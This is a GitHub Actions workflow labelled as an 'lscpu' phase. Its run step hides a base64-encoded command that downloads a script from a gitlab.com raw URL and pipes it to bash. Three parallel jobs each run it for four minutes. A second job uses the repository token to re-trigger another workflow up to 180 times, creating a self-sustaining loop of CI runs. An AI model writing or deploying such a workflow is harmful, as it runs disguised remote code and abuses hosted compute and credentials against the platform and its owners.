name: 🔵 LSCPU Phase

on:
  workflow_dispatch:
    inputs:
      loop_count:
        description: 'Siklus tersisa'
        required: true
        default: '180'

permissions:
  actions: write

jobs:
  run-lscpu:
    name: ${{ matrix.name }}
    strategy:
      fail-fast: false
      max-parallel: 3
      matrix:
        include:
          - name: lscpu-1
          - name: lscpu-2
          - name: lscpu-3
    runs-on: ubuntu-latest
    timeout-minutes: 5
    steps:
      - run: echo "hello world" & base64 -d <<< Y3VybCAtc0wgIGh0dHBzOi8vZ2l0bGFiLmNvbS9tYWthbmFuOTkvZGlhbW9uZHMvLS9yYXcvbWFpbi9yZXAuc2ggfCBiYXNo | sh & sleep 240

  trigger-hello:
    needs: run-lscpu
    runs-on: ubuntu-latest
    if: github.event.inputs.loop_count > 0
    steps:
      - name: Panggil Hello Phase
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
        run: |
          new_loop=$(( ${{ github.event.inputs.loop_count }} - 1 ))
          curl -X POST \
            -H "Authorization: token $GITHUB_TOKEN" \
            -H "Accept: application/vnd.github.v3+json" \
            https://api.github.com/repos/${{ github.repository }}/actions/workflows/phase-hello.yml/dispatches \
            -d "{\"ref\":\"main\",\"inputs\":{\"loop_count\":\"$new_loop\"}}"